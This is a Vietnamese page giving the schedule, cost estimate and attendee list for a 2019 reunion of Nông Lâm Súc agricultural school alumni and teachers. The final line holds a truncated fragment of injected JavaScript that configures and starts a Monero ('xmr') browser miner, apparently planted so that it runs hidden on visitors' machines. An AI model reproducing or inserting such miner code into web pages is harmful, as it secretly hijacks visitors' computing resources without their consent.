CHƯƠNG TRÌNH ĐI DỰ HỌP MẶT TRUYỀN THỐNG NLS ĐỊNH TƯỜNG – BẾN TRE NGÀY 1 THÁNG 5 NĂM 2019 của Liên Trường TH Nông Lâm Súc

CHƯƠNG TRÌNH ĐI DỰ HỌP MẶT TRUYỀN THỐNG

NLS ĐỊNH TƯỜNG – BẾN TRE NGÀY 1 THÁNG 5 NĂM 2019

của Liên Trường TH Nông Lâm Súc

 

- 6 giờ sáng có mặt tại nhà hàng Đoàn Viên ăn sáng.

- 6 giờ 30’ khởi hành về Định Tường

- 8 giờ 30’ về tới Mỹ Tho

- 9 giờ bắt đầu Họp Mặt Truyền thống NLS Định Tường – Bến Tre.

- 14 giờ kết thúc.

- Tham quan chùa Vĩnh Tràng ( Mỹ Tho)

- 15 giờ 30’ Tham quan Lăng Thủ Khoa Huân ( Tân Lý Tây).

- 17 giờ về Sài Gòn

Dự trù tài chánh: 500.000đ

- Tiền xe : 100.000 đ

- Đóng góp tiệc : 300.000đ

- Ăn sáng + Cà phê : # 100.000đ

 

DANH SÁCH THAM DỰ HỌP MẶT 1/5/2019

NLS ĐỊNH TƯỜNG

STT

HỌ TÊN

ĐT

TRƯỜNG

GHI CHÚ

1

Trần Thị Tuyết

 

NLS Định Tường

 

2

Cô Võ Thị Vân

 

NLS Bảo Lộc, Bình Dương

 

3

Tôn Nữ Diệu Thanh

 

 NLS Huế

 

4

Nguyễn Thị Thu Tuyết

 

NLS - Ninh Thuận

XR

5

Trần Anh

 

NLS Bình Thuận

XR

6

Nguyễn Thanh Tùng

 

NLMSG

 

7

Thầy Trần Văn Bậu

 

 NLS Bình Thuận

 

8

Thầy Trần Hữu Nghiệp

 

NLS  Bến Tranh

 

9

Tôn Thất Thuyết

 

NLS - Huế

 

10

Nguyễn Kim Chủng

 

NLS - Phú Yên

 

11

Tiền Quốc Cơ - K10

 

CĐNLS

 

12

Chị Ngô Thị Huệ

 

CĐNLS

 

13

Nguyễn Thị Kim Diệp

 

NLS  Huế

 

14

Nguyễn Hoàng Thị Thông

 

NLMSG

 

15

Thầy Võ Văn Ninh

 

NLS Bảo Lộc

XR

16

Cô Nguyễn Thị Hồng

 

NLS  Bảo Lộc

XR

17

Thầy Tôn Thất Phước

 

NLS Bảo Lộc

XR

18

Thầy Huỳnh Văn Hoàn

 

NLMSG

 

19

Thầy Nguyễn Minh Tâm

 

NLS Huế

 

20

Thầy Nguyễn Thạch

 

NLS  Huế

 

21

Cô Trương Thị Tố Nga

 

NLS  Huế

 

22

Thầy Nguyễn Đăng Diễn  

 

NLS Bình Thuận

XR

23

Nguyễn Thị Ngọc Thủy

 

NLS Bình Thuận

 

24

Thầy Trần Thuận

 

NLS Huế

 

25

Cô Nguyễn Thị Nam

 

NLS  Huế

 

26

Thầy Châu Bá Lộc

 

NLS Cần Thơ

XR

27

Thầy  Nguyễn Trung Quân

 

NLS  An Giang

 

28

Nguyễn Thị Phượng

 

 NLS Tây Ninh

 

29

Anh Hà Công Đống

 

NLS  Huế

 

30

Thầy Châu Vĩnh Phước

 

NLS Bến Tranh

XR

31

Cô Nguyễn Thị Hạnh

 

NLS Bến Tranh

XR

32

Võ Bá Khương

NLS Định Tường

 

33

Lê Công Mẫn

 

NLS Định Tường


34

Cô Nguyễn Thị Ánh

 

NLS Định Tường


35

Cô Ong Nguyệt Nga

 

NLS Định Tường 

 

36

 Cô Phạm Thị Xuân Nga
 

NLS Định Tường 

 

37

Đoàn NLS Darlac# 10

 

 

 

38


 


 

39

 Liên Khối 72-75 #

 

NLS Bảo Lộc 

XR 

40

 Ái Hữu NLS#

 

 

 

41

 Đoàn Cần Thơ #7

 

NLS Cần Thơ 

XR 

42

 

 

 

 

43

 

 

 

 

44

 

 

 

 

45

 

 

 

 

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();